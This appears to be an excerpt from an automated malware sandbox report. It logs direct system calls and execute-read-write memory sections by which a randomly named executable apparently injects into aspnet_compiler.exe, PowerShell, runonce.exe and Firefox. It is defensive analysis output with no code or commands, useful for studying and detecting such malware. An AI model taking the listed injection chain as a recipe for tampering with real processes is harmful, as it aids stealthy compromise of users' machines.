Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: NULL target: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	Section loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: NULL target: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: NULL target: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior